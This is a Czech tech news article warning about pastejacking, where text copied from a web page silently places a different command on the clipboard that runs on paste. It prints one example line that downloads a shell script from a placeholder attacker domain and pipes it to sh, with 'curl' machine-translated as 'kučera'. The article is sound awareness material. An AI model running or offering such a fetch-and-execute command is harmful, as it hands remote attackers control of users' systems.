Jak kopírování a vkládání vás může dostat do větších problémů, než si myslíte

  • Všichni denně kopírujeme a vkládáme z internetu, aniž bychom znali rizika.
  • Bezpečnostní expert si udělal čas, aby všem ukázal nejhorší možný scénář.
  • Vkládání příkazů, které jste získali z internetu, do vašeho terminálu je rychlý způsob, jak se nechat hacknout
  • Příkazy, o kterých jste si mysleli, že je vkládáte do svého terminálu, jsou ve skutečnosti škodlivé kódy.
hacker

Je pravda, že žijeme v době, kdy je rychlost vším a záleží jen na rychlých výsledcích. Málokdo se však na chvíli zastaví a zamyslí se nad důsledky.

Miliony programátorů, správců a bezpečnostních výzkumníků denně provádějí jednoduché úkoly, jako je kopírování a vkládání příkazů z webových stránek přímo do konzolí na svých počítačích.

Ačkoli o tom mnozí ani nepřemýšlejí, důsledky jsou větší a nebezpečnější, než byste si mohli zpočátku myslet, zvláště pokud uchováváte citlivá nebo cenná data.

Známý bezpečnostní expert si udělal čas a podělil se co by se vlastně mohlo stát pokud zkopírujete a vložíte obsah z webových stránek.

Copy+Paste je snadný způsob, jak se skutečně nechat hacknout

Gabriel Friedlander, který je zakladatelem školicí platformy pro zvyšování povědomí o bezpečnosti Wizer, vytáhl obálku schématu, které vás donutí dvakrát si rozmyslet, než zkopírujete a vložíte příkazy z webových stránek.

Kopírování a vkládání obsahu z internetu je v dnešní době tak běžné, že se nad tím nikdo ani nezamýšlí.

Friedlander však varuje, že některé webové stránky jsou klamavější, než by si člověk na první pohled uvědomoval, a to, co si myslíte, že jste z nich zkopírovali, se velmi liší od toho, co jste skutečně udělali.

A nejhorší na tom všem je, že bez potřebných znalostí nebo vedení si oběti uvědomí svou chybu až po vložení textu, v tu chvíli už může být pozdě.

Bezpečnostní analytik také vymyslel malý test pro čtenáře svého blogu, aby lidé skutečně pochopili, jak snadné je pro vás neochotně otevřít dveře kyberzločincům.

Poskytl příkaz, který je určen ke zkopírování, ale související pravda se odhalí pouze tehdy, když vložíte text a uvidíte, co jste ve svém nastavení skutečně zavedli.

Po zkopírování příkazu zobrazeného na výše uvedeném snímku obrazovky vás výsledek vložení šokuje, protože je daleko od toho, co jste si mysleli, že duplikujete.

kučera http://attacker-domain: 8000/shell.sh | sh

Kromě zcela jiného příkazu, který se nachází ve vaší schránce, je znak nového řádku (nebo návratu) at jeho konec znamená, že se výše uvedený příklad spustí, jakmile bude vložen přímo do Linuxu terminál.

Takže byste si měli být lépe vědomi toho, co se skutečně děje, a berte to jako vážné bezpečnostní riziko. Neříkáme, že všechny webové stránky skrývají škodlivý obsah, ale vyplatí se to vzít v úvahu.

Stalo se vám někdy, že jste byli hacknuti při vkládání riskantních příkazů do vašeho terminálu? Podělte se s námi o své zkušenosti v sekci komentářů níže.

Co je UpdateCheck.exe a k čemu se používá?

Co je UpdateCheck.exe a k čemu se používá?Vysoké Využití ProcesoruMalwareVýkon Počítače

Vše o procesu a tipech, jak snížit využití procesoruThe UpdateCheck.exe proces je obecně propojen s aplikací třetí strany, která jej používá k vyhledávání novějších verzí.Některé pozoruhodné aplika...

Přečtěte si více
Jak opravit MRT.exe vysoké využití CPU a disku: 3 rychlé způsoby

Jak opravit MRT.exe vysoké využití CPU a disku: 3 rychlé způsobyVysoké Využití ProcesoruMalwareWindows 10

Přečtěte si, jak snadno zastavit Nástroj pro odstranění škodlivého softwaru MRT.exe je nativní software Windows, který vyhledá a zbaví malwaru z vašeho počítače.Bylo však hlášeno, že samotný MRT.ex...

Přečtěte si více
Může vás napadnout QR kód? [Průvodce prevencí]

Může vás napadnout QR kód? [Průvodce prevencí]Problémy S I PhoneMalwareBezpečnostní

Připravte se na to, že budete našimi zjištěními překvapeniS QR kódy se setkáváme všude, ať už na webových stránkách, v kavárně nebo dokonce na billboardech. Zprávy naznačují, že hackeři znovu a zno...

Přečtěte si více